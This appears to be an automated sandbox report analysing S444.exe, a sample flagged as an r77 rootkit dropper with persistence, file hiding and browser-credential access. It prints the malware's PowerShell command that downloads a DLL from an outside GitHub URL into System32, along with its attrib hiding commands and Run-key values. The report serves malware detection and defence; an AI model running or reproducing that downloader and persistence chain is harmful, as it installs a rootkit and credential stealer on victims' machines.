Analysis
-
max time kernel
299s -
max time network
298s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
09-12-2024 23:00
Behavioral task
behavioral1
Sample
flash ETH v.1.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral2
Sample
S444.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
SYS.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral4
Sample
USDT Flasher.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral5
Sample
ss32.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral6
Sample
winlogoc.exe
Resource
win10v2004-20241007-en
General
-
Target
S444.exe
-
Size
33KB
-
MD5
17e158e0f91dcc8168f2e416035926ed
-
SHA1
aac8bf1174db86568aab282b8a8de953c372ef1e
-
SHA256
bb0ef384a2d6f8fff82eecd15908bd39146ffa65810c2c56934c32c88abac94b
-
SHA512
383df3fa4eaecbfc6698961d3a8f5fe726db3e0cddf83f357bc9f2947328a284f4fe5b13f2eb866ea9c50eafbb5fc45b788b8401edffcbfc5bf068f545dd167c
-
SSDEEP
768:WdQHdYES3hnpwEC/uc/zBaP09K737hNWhlLF:W7x8zgs9W37hMPJ
Malware Config
Extracted
https://github.com/NGROKC/CTC/raw/main/CTC64.dll
Signatures
-
R77 family
-
r77 rootkit payload 1 IoCs
Detects the payload of the r77 rootkit.
resource yara_rule behavioral2/files/0x0008000000023c8a-48.dat r77_payload -
Blocklisted process makes network request 2 IoCs
flow pid Process 21 1996 powershell.exe 23 1996 powershell.exe -
Downloads MZ/PE file
-
Event Triggered Execution: AppInit DLLs 1 TTPs
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes.
-
Sets file to hidden 1 TTPs 2 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 4536 attrib.exe 3764 attrib.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation S444.exe Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation $77-System32.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77-System32.exe $77-System32.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77-System32.exe $77-System32.exe -
Executes dropped EXE 1 IoCs
pid Process 4704 $77-System32.exe -
Loads dropped DLL 1 IoCs
pid Process 3244 Process not Found -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$77-System32 = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\$77-System32.exe" $77-System32.exe Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\$77-System32 = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\$77-System32.exe" $77-System32.exe -
pid Process 1996 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 22 raw.githubusercontent.com 23 raw.githubusercontent.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language $77-System32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language S444.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 4704 $77-System32.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1996 powershell.exe 1996 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1996 powershell.exe Token: SeDebugPrivilege 4704 $77-System32.exe Token: 33 4704 $77-System32.exe Token: SeIncBasePriorityPrivilege 4704 $77-System32.exe Token: 33 4704 $77-System32.exe Token: SeIncBasePriorityPrivilege 4704 $77-System32.exe Token: 33 4704 $77-System32.exe Token: SeIncBasePriorityPrivilege 4704 $77-System32.exe Token: 33 4704 $77-System32.exe Token: SeIncBasePriorityPrivilege 4704 $77-System32.exe Token: 33 4704 $77-System32.exe Token: SeIncBasePriorityPrivilege 4704 $77-System32.exe Token: 33 4704 $77-System32.exe Token: SeIncBasePriorityPrivilege 4704 $77-System32.exe Token: 33 4704 $77-System32.exe Token: SeIncBasePriorityPrivilege 4704 $77-System32.exe Token: 33 4704 $77-System32.exe Token: SeIncBasePriorityPrivilege 4704 $77-System32.exe Token: 33 4704 $77-System32.exe Token: SeIncBasePriorityPrivilege 4704 $77-System32.exe Token: 33 4704 $77-System32.exe Token: SeIncBasePriorityPrivilege 4704 $77-System32.exe Token: 33 4704 $77-System32.exe Token: SeIncBasePriorityPrivilege 4704 $77-System32.exe Token: 33 4704 $77-System32.exe Token: SeIncBasePriorityPrivilege 4704 $77-System32.exe Token: 33 4704 $77-System32.exe Token: SeIncBasePriorityPrivilege 4704 $77-System32.exe Token: 33 4704 $77-System32.exe Token: SeIncBasePriorityPrivilege 4704 $77-System32.exe Token: 33 4704 $77-System32.exe Token: SeIncBasePriorityPrivilege 4704 $77-System32.exe Token: 33 4704 $77-System32.exe Token: SeIncBasePriorityPrivilege 4704 $77-System32.exe Token: 33 4704 $77-System32.exe Token: SeIncBasePriorityPrivilege 4704 $77-System32.exe Token: 33 4704 $77-System32.exe Token: SeIncBasePriorityPrivilege 4704 $77-System32.exe Token: 33 4704 $77-System32.exe Token: SeIncBasePriorityPrivilege 4704 $77-System32.exe Token: 33 4704 $77-System32.exe Token: SeIncBasePriorityPrivilege 4704 $77-System32.exe Token: 33 4704 $77-System32.exe Token: SeIncBasePriorityPrivilege 4704 $77-System32.exe Token: 33 4704 $77-System32.exe Token: SeIncBasePriorityPrivilege 4704 $77-System32.exe Token: 33 4704 $77-System32.exe Token: SeIncBasePriorityPrivilege 4704 $77-System32.exe Token: 33 4704 $77-System32.exe Token: SeIncBasePriorityPrivilege 4704 $77-System32.exe Token: 33 4704 $77-System32.exe Token: SeIncBasePriorityPrivilege 4704 $77-System32.exe Token: 33 4704 $77-System32.exe Token: SeIncBasePriorityPrivilege 4704 $77-System32.exe Token: 33 4704 $77-System32.exe Token: SeIncBasePriorityPrivilege 4704 $77-System32.exe Token: 33 4704 $77-System32.exe Token: SeIncBasePriorityPrivilege 4704 $77-System32.exe Token: 33 4704 $77-System32.exe Token: SeIncBasePriorityPrivilege 4704 $77-System32.exe Token: 33 4704 $77-System32.exe Token: SeIncBasePriorityPrivilege 4704 $77-System32.exe Token: 33 4704 $77-System32.exe Token: SeIncBasePriorityPrivilege 4704 $77-System32.exe -
Suspicious use of WriteProcessMemory 21 IoCs
description pid Process procid_target PID 3728 wrote to memory of 3756 3728 S444.exe 90 PID 3728 wrote to memory of 3756 3728 S444.exe 90 PID 3728 wrote to memory of 3756 3728 S444.exe 90 PID 3756 wrote to memory of 4536 3756 cmd.exe 92 PID 3756 wrote to memory of 4536 3756 cmd.exe 92 PID 3756 wrote to memory of 4536 3756 cmd.exe 92 PID 3728 wrote to memory of 4704 3728 S444.exe 93 PID 3728 wrote to memory of 4704 3728 S444.exe 93 PID 3728 wrote to memory of 4704 3728 S444.exe 93 PID 4704 wrote to memory of 232 4704 $77-System32.exe 100 PID 4704 wrote to memory of 232 4704 $77-System32.exe 100 PID 4704 wrote to memory of 232 4704 $77-System32.exe 100 PID 232 wrote to memory of 3764 232 cmd.exe 102 PID 232 wrote to memory of 3764 232 cmd.exe 102 PID 232 wrote to memory of 3764 232 cmd.exe 102 PID 4704 wrote to memory of 2696 4704 $77-System32.exe 103 PID 4704 wrote to memory of 2696 4704 $77-System32.exe 103 PID 4704 wrote to memory of 2696 4704 $77-System32.exe 103 PID 2696 wrote to memory of 1996 2696 cmd.exe 105 PID 2696 wrote to memory of 1996 2696 cmd.exe 105 PID 2696 wrote to memory of 1996 2696 cmd.exe 105 -
Views/modifies file attributes 1 TTPs 2 IoCs
pid Process 4536 attrib.exe 3764 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3728 -
C:\Windows\SysWOW64\cmd.execmd.exe /c attrib +s +h +r "C:\Users\Admin\AppData\Local\Temp\S444.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3756 -
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r "C:\Users\Admin\AppData\Local\Temp\S444.exe"3⤵
- Sets file to hidden
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:4536
-
-
-
C:\System32\$77-System32.exe"C:\System32\$77-System32.exe"2⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4704 -
C:\Windows\SysWOW64\cmd.execmd.exe /c attrib +s +h +r "C:\System32\$77-System32.exe"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:232 -
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r "C:\System32\$77-System32.exe"4⤵
- Sets file to hidden
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:3764
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Rot.bat" "3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2696 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell (new-object System.Net.WebClient).DownloadFile('https://github.com/NGROKC/CTC/raw/main/CTC64.dll','\System32\r77-x64.dll');exit4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1996
-
-
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Event Triggered Execution
1AppInit DLLs
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Event Triggered Execution
1AppInit DLLs
1Defense Evasion
Hide Artifacts
2Hidden Files and Directories
2Modify Registry
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
33KB
MD517e158e0f91dcc8168f2e416035926ed
SHA1aac8bf1174db86568aab282b8a8de953c372ef1e
SHA256bb0ef384a2d6f8fff82eecd15908bd39146ffa65810c2c56934c32c88abac94b
SHA512383df3fa4eaecbfc6698961d3a8f5fe726db3e0cddf83f357bc9f2947328a284f4fe5b13f2eb866ea9c50eafbb5fc45b788b8401edffcbfc5bf068f545dd167c
-
Filesize
147KB
MD51b8bd653321cf3cbc786e563555fbc75
SHA15638efe0476c8c1b74c6604db419be814d1d90a0
SHA256919a332e85d7c32a6f0a1bdd15b211b8b273b73fe05a553ea0f230a0958586c7
SHA512bafdbc8413828c5427983fa0e9403a2d9a88d0ad2f27f92842310852d273f2d2c9a0c6f9f64e1aac03fadf49f9a3bcf58c6b7c8b06debcce46536114cde0175b
-
Filesize
20KB
MD549693267e0adbcd119f9f5e02adf3a80
SHA13ba3d7f89b8ad195ca82c92737e960e1f2b349df
SHA256d76e7512e496b7c8d9fcd3010a55e2e566881dc6dacaf0343652a4915d47829f
SHA512b4b9fcecf8d277bb0ccbb25e08f3559e3fc519d85d8761d8ad5bca983d04eb55a20d3b742b15b9b31a7c9187da40ad5c48baa7a54664cae4c40aa253165cbaa2
-
Filesize
229B
MD55623353a38611880912397750358a0cf
SHA11abfda3058cae5b11da3e6551fbec2eb354a25d3
SHA2564b97706d98357279a5f3f1c720f384a47d020a1fbb6aac5460e1d87786aba86c
SHA51278b78820ce33341f40f71924087d255b6ec74472bb22562a2bfadf5f090662c691d5a293f5f8148477f414cf7f38c53c490b595489d79966d944dfe73097f0fb
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82